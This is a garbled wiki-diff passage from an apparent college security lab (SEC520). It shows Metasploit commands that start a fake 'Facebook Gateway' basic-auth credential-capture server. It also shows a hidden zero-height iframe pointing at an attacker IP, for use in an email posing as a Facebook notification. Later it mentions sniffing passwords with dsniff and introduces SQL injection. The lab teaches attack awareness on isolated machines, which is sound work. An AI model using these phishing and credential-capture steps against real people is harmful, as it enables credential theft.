53
edits
Changes
no edit summary
</p>
<h2> <span class="mw-headline">Prerequisites</span></h2>
<ul><li> [https://scswiki.senecaccdot.onsenecacollege.ca/%7Efacwiki/sec520SEC520/labs/SEC520_Lab_3.html Lab_3 SEC520 Lab 3]
</li></ul>
<p><br>
<br /></li>
<li>In the <b>msfconsole</b>, issue the following commands:
<br /><br /li>
</ol>
<pre style="font-family:courier;"> <b>use auxiliary/server/capture/http_basic
show options
set REALM Facebook Gateway
set URIPATH /
run</b> </pre></br /></li>
<ol>
<li value="3">Note the <b>LOCAL IP ADDRESS</b>. You will be entering that address in a web-browser on your targeted Windows server.</li>
<li>Here is a link to sample HTML code: [https://scs.senecac.on.ca/%7Efac/sec520/labs/email-attachment-template.html.txt Template of e-mail attachment]</li>
<li>Edit the file to contain the following iframe (that will draw the user to your attack website):<br><br>
<pre> <b> <iframe src="ATTACK_SERVER_IP_ADDRESS" width="100" height="0"> </iframe></b>
</pre></li>
<li>We could then send this HTML file via an e-mail to the user (in this case masquerading as a facebook notification. You could simulate this attack for demonstration by creating the html file in your Windows server, and load this file with a web-browser (like Internet Explorer).<br /><br />Another approach would be to send a "phony" notification with links to the facebook "login" page with the <iframe> element.</li>
<li>Switch to your vulnerable Windows and Linux machines. Is the connection (using the ping command) re-established? Record your findings in your lab log-book.<br /><br /></li>
</ol>
{{Admon/important|Obtaining Username / Password Information|One of the main reasons for a <b>"man in the middle" attack</b> is to obtain sensitive information such as a username and password for further exploitation. A <b>Packet Sniffer</b> is a useful tool when using a "man in the middle attack". Throughout your journey in the area of Internet Security, you will soon learn there is an ambundence of tools, many of which do the same thing (including packet sniffers). For the remainder of this section we will use a packet sniffer tool called <b>dsniff</b>.|}}
<br>
<ol>
<br>
<b>SQL injection attacks</b> are basically in the form of introducing or "injecting" malicious code via the input (form) for the SQL/MYSQL database, in order to gain access to the backend database. There are many different methods of injection attacks. We will demonstrate a fairly common method of injection attack which exploits a weakness for the MYSQL server (that fail to <b>sanitize</b> user input. In this case, the user inserting illegal characters (single quote <b>i</b>) within an established web-based database form.
<br><br>
In this section, we will only <u>expose</u> the student to the concept of an injection attack. <b>You are <u>NOT</u> required to setup the MYSQL server, or run a SQL injection attack on your vulnerable machines...</b>